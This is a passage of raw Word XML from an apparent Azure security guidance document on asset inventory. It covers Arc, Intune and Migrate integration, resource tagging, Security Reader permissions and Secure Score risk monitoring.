      </w:r>
    </w:p>
    <w:p w14:paraId="2ABDB788" w14:textId="5BD2E7F4" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:t>Cross-cloud dependency mapping: Visualize dependencies between Azure, on-premises, AWS, and Google Cloud resources identifying connectivity requirements and migration candidates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31765E59" w14:textId="15BFACC5" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Cross-cloud dependency mapping: Visualize dependencies between Azure, on-premises, AWS, and Google Cloud resources identifying connectivity requirements and migration candidates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6B8998" w14:textId="027C9A17" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t xml:space="preserve">Centralized asset reporting: Generate unified asset inventory reports aggregating Azure-native, Arc-enabled servers, Kubernetes clusters, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001274D4">
        <w:t>multicloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001274D4">
        <w:t xml:space="preserve"> resources in single dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D039892" w14:textId="2DD72ADC" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Azure Arc security and governance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E0D058" w14:textId="463B287D" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Microsoft Defender for Cloud integration: Extend Defender for Cloud security posture assessment, vulnerability scanning, and threat protection to Arc-enabled servers and Kubernetes clusters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD61B5D" w14:textId="3DEA12AE" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t xml:space="preserve">Azure Policy enforcement: Apply Azure Policy to hybrid and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001274D4">
        <w:t>multicloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001274D4">
        <w:t xml:space="preserve"> resources ensuring consistent security baselines, compliance requirements, and configuration standards across all environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18003015" w14:textId="782173E4" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Azure Monitor integration: Collect logs, metrics, and performance data from Arc-enabled resources into Azure Monitor and Log Analytics for unified monitoring and alerting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA00483" w14:textId="2F406034" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Azure Update Manager: Centralize patch management for Arc-enabled Windows and Linux servers using Azure Update Manager ensuring consistent security patching across hybrid infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E86587B" w14:textId="3F549768" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:lastRenderedPageBreak/>
        <w:t>Microsoft Sentinel correlation: Stream security events from Arc-enabled servers to Microsoft Sentinel correlating hybrid infrastructure security signals with cloud-native Azure security telemetry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548344AE" w14:textId="3333FF0F" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Microsoft Intune device inventory integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C5F768" w14:textId="175EE1EA" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Endpoint asset discovery: Extend asset inventory to corporate-managed endpoints including Windows, macOS, iOS, and Android devices using Microsoft Intune providing unified visibility across cloud infrastructure and endpoint devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56304F19" w14:textId="2B5130E5" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Device compliance status: Track device compliance status alongside cloud resource inventory identifying non-compliant endpoints requiring remediation before granting access to sensitive resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D208655" w14:textId="6FCB0F3A" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Conditional access integration: Correlate Intune device compliance with Azure resource access policies ensuring only compliant managed devices can access asset management interfaces and sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACB398C" w14:textId="77D42F5F" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Hardware and software inventory: Collect hardware specifications, installed applications, and security configurations from managed endpoints complementing cloud resource inventory for comprehensive asset visibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C998F92" w14:textId="1D6BED25" w:rsidR="000737AC" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Azure Migrate discovery integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4363E565" w14:textId="6EA1B2DA" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Pre-cloud assessment: Use Azure Migrate for agentless discovery of on-premises VMware, Hyper-V, physical servers, and AWS/GCP virtual machines identifying migration candidates and dependencies before Azure onboarding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B887D61" w14:textId="1401BC57" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Dependency mapping: Visualize application dependencies and network connectivity patterns across on-premises infrastructure informing migration planning and Azure resource provisioning strategies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081BAB3C" w14:textId="0812D844" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Performance and sizing data: Collect performance metrics and utilization data from on-premises workloads enabling right-sizing recommendations and cost optimization for Azure migrations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB716F2" w14:textId="4B4B7BCD" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Migration readiness assessment: Assess migration readiness including compatibility checks, cost estimates, and security considerations establishing baseline inventory before cloud adoption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A2751B" w14:textId="018C1BDA" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Strategic tagging framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDCAFCE" w14:textId="0EF51D32" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Business criticality tags: Classification of resources by business impact levels (Critical, High, Medium, Low) enabling risk-based security prioritization and incident response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492AD0EA" w14:textId="245F7334" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Data classification tags: Tagging resources based on data sensitivity levels (Public, Internal, Confidential, Highly Confidential) supporting data protection policies and compliance requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2D7DC8" w14:textId="16AEA956" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:lastRenderedPageBreak/>
        <w:t>Environment tags: Clear separation of production, staging, development, and test environments preventing accidental impact to production systems during security operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2096AE" w14:textId="58A897A7" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Cost center and ownership tags: Business unit, cost center, and technical owner assignments enabling accountability, chargeback, and rapid stakeholder notification during security incidents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604C70B8" w14:textId="62B0DE31" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="001274D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Compliance scope tags: Tagging resources subject to specific regulatory requirements (PCI-DSS, HIPAA, SOX, GDPR) triggering appropriate security controls and audit procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7DB483" w14:textId="6D8C1EA5" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Tag enforcement and governance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651CE4C3" w14:textId="0BF9202A" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Azure Policy tag enforcement: Automated tag requirement policies preventing resource creation without mandatory tags and ensuring consistent taxonomy across organization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785628F0" w14:textId="2C051363" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Tag inheritance: Resource group and subscription-level tags automatically inherited by child resources ensuring consistent classification without manual tagging burden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08435C09" w14:textId="22894D52" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Tag value validation: Azure Policy validation of tag values against approved lists preventing typos and ensuring standardized classification across the organization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D25B34" w14:textId="51B3974A" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Tag audit and remediation: Regular audit of tag compliance with automated remediation workflows adding missing tags based on resource characteristics and security assessments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AED95D" w14:textId="3E80F115" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="001274D4">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>AM-1.3: Grant security organization inventory access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DC0152" w14:textId="2CFE6E3C" w:rsidR="001274D4" w:rsidRDefault="001274D4" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Configure security team asset visibility through these permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCEEA1B" w14:textId="77777777" w:rsidR="00950439" w:rsidRPr="00950439" w:rsidRDefault="00950439" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="388"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950439">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Ensure security organizations have appropriate permissions to view and monitor asset inventory using </w:t>
      </w:r>
      <w:r w:rsidRPr="00950439">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Security Reader role</w:t>
      </w:r>
      <w:r w:rsidRPr="00950439">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00950439">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Azure RBAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00950439">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00950439">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>management group</w:t>
      </w:r>
      <w:r w:rsidRPr="00950439">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> scoping for comprehensive visibility without excessive privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D127BC" w14:textId="7DA7C00D" w:rsidR="001274D4" w:rsidRDefault="001274D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001274D4">
        <w:t>Security organization permission strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780D4B57" w14:textId="58294FBF" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Security Reader role assignment: Grant Security Reader role at management group or subscription scope enabling security teams to view resources, security alerts, and recommendations without modification capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FE1D52" w14:textId="1488B9BD" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Management group scoping: Apply permissions at Root Management Group level for enterprise-wide security visibility or scope to specific business units based on organizational structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C30B49" w14:textId="388BC8A1" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Defender for Cloud access: Ensure security teams have access to Defender for Cloud asset inventory, security recommendations, and compliance dashboards for centralized risk visibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422F432A" w14:textId="4A590DF8" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Azure Resource Graph </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009920C7">
        <w:t>query access</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009920C7">
        <w:t>: Provide security analysts access to Azure Resource Graph Explorer for custom asset discovery queries and security research without requiring resource-level permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B184593" w14:textId="50189FB8" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Log Analytics Reader access: Grant security teams Log Analytics Reader permissions for security log analysis and threat hunting without access to modify workspace configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3C5437" w14:textId="4CB63133" w:rsidR="009920C7" w:rsidRDefault="009920C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Operational security integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49771B70" w14:textId="61448170" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Automated inventory sharing: Export asset inventory to security information and event management (SIEM) platforms and security orchestration tools for correlation and automation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108EDAD3" w14:textId="4DABF1B8" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Continuous monitoring integration: Integrate asset inventory with Microsoft Sentinel for real-time security monitoring, threat detection, and automated response to asset-related risks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FC328A" w14:textId="7CCC655B" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t xml:space="preserve">Security metrics and reporting: Provide security leadership with dashboards and reports showing asset growth, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009920C7">
        <w:t>security posture</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009920C7">
        <w:t xml:space="preserve"> trends, and risk exposure across cloud environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2472D1FD" w14:textId="63A467F6" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="009920C7">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>AM-1.4: Monitor asset risks and security posture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C0C6C1" w14:textId="522B637E" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1170"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Establish continuous asset risk monitoring through these capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D43FDD" w14:textId="36E630E2" w:rsidR="009920C7" w:rsidRDefault="009920C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Continuous risk assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4490B077" w14:textId="27540B2A" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Secure Score monitoring: Track Microsoft Defender for Cloud Secure Score across subscriptions and management groups measuring overall security posture and control effectiveness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B00F7C" w14:textId="2F1A2027" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Security recommendation tracking: Monitor security recommendations by severity level with prioritization based on asset criticality, potential impact, and threat intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C897259" w14:textId="0B64C4F4" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
